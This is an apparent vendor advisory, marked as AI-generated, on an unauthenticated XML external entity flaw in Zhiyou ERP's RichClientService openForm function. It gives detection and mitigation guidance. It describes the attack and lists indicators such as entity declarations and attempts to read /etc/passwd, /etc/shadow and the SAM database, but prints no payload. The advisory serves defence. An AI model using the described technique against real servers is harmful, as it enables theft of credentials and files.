CVE-2025-11140 Overview
A critical XML External Entity (XXE) vulnerability has been identified in Bjskzy Zhiyou ERP up to version 11.0. The vulnerability exists within the openForm function of the com.artery.richclient.RichClientService component, where improper handling of the contentString argument allows attackers to inject malicious XML external entity references. This flaw can be exploited remotely without authentication, potentially enabling attackers to read sensitive files, perform server-side request forgery (SSRF), or cause denial of service conditions.
Critical Impact
Remote attackers can exploit this XXE vulnerability to access confidential data, enumerate internal network resources, or disrupt service availability. The exploit is publicly available, increasing the risk of active exploitation.
Affected Products
- Zhiyou-group Zhiyou ERP versions up to 11.0
- com.artery.richclient.RichClientService component
- Systems with exposed RichClientService endpoints
Discovery Timeline
- September 29, 2025 - CVE-2025-11140 published to NVD
- October 3, 2025 - Last updated in NVD database
Technical Details for CVE-2025-11140
Vulnerability Analysis
This XXE vulnerability (CWE-611: Improper Restriction of XML External Entity Reference) arises from the application's failure to properly sanitize or disable external entity processing in XML input. The openForm function within the RichClientService component accepts a contentString argument that is parsed as XML without adequate security controls. When an attacker submits a specially crafted XML payload containing external entity declarations, the XML parser resolves these entities, leading to unauthorized information disclosure or server-side request execution.
The vulnerability is classified under both CWE-611 (XML External Entity Reference) and CWE-610 (Externally Controlled Reference to a Resource in Another Sphere), indicating that the application does not properly restrict access to external resources referenced within user-supplied XML data.
Root Cause
The root cause of this vulnerability is the insecure configuration of the XML parser used by the openForm function in the RichClientService component. The application fails to disable external entity processing and does not implement proper input validation on the contentString parameter. When XML documents containing DTD (Document Type Definition) declarations with external entity references are submitted, the parser resolves these entities, allowing attackers to reference arbitrary local files or external URLs.
Attack Vector
The attack can be executed remotely over the network without requiring authentication. An attacker crafts a malicious XML payload containing an external entity declaration that references a sensitive file on the server (such as /etc/passwd on Unix systems or configuration files containing credentials) or an internal network resource. When submitted to the vulnerable openForm function via the contentString parameter, the XML parser processes the entity reference and includes the contents of the targeted resource in the application's response.
This attack vector enables several exploitation scenarios:
- File Disclosure: Reading sensitive configuration files, credentials, or application source code
- SSRF Attacks: Probing internal network infrastructure or accessing internal services
- Denial of Service: Referencing recursive entities or large external files to exhaust server resources
The exploit is publicly documented through the GitHub Project Documentation, and additional technical details are available through VulDB #326217.
Detection Methods for CVE-2025-11140
Indicators of Compromise
- Unusual XML payloads containing <!DOCTYPE or <!ENTITY declarations in HTTP requests to RichClientService endpoints
- Requests to the openForm function with contentString parameters containing external entity references
- Server logs showing file access attempts for sensitive system files such as /etc/passwd, /etc/shadow, or Windows SAM database
- Outbound connections from the ERP server to unexpected external URLs or internal IP addresses
Detection Strategies
- Implement web application firewall (WAF) rules to detect and block XML payloads containing external entity declarations
- Monitor HTTP request bodies for suspicious XML patterns including SYSTEM, PUBLIC, or URL references within DTD declarations
- Configure intrusion detection systems (IDS) to alert on attempts to access sensitive file paths via the RichClientService component
- Perform regular log analysis for anomalous requests targeting the openForm function
Monitoring Recommendations
- Enable detailed logging for all RichClientService component interactions and XML parsing operations
- Implement file integrity monitoring on sensitive system and application configuration files
- Monitor network traffic for unusual outbound connections originating from the Zhiyou ERP server
- Establish baseline behavior for the openForm function and alert on deviations in request patterns or payload sizes
How to Mitigate CVE-2025-11140
Immediate Actions Required
- Restrict network access to the RichClientService component to trusted IP addresses only
- Implement input validation to reject XML payloads containing DTD declarations or external entity references
- Deploy a web application firewall with rules specifically designed to detect and block XXE attack patterns
- Isolate affected Zhiyou ERP systems from sensitive network segments until a patch is available
Patch Information
The vendor (Zhiyou-group) was contacted regarding this vulnerability but did not respond. At the time of publication, no official patch is available. Organizations using affected versions of Zhiyou ERP should implement the workarounds described below and monitor vendor communications for security updates.
Additional vulnerability information is available through VulDB CTI ID #326217 and VulDB Submission #658090.
Workarounds
- Disable external entity processing in the XML parser configuration at the application or server level
- Implement network segmentation to limit the exposure of the RichClientService component
- Use a reverse proxy or WAF to filter XML requests and strip DTD declarations before they reach the application
- Consider temporarily disabling the openForm functionality if it is not business-critical until a proper fix is available
# Example XML parser hardening configuration (application-specific)
# Disable DTD processing in Java XML parsers
# Add these properties to your XML parser factory configuration:
# XMLInputFactory.SUPPORT_DTD = false
# XMLInputFactory.IS_SUPPORTING_EXTERNAL_ENTITIES = false
# XMLConstants.ACCESS_EXTERNAL_DTD = ""
# XMLConstants.ACCESS_EXTERNAL_STYLESHEET = ""
Disclaimer: This content was generated using AI. While we strive for accuracy, please verify critical information with official sources.
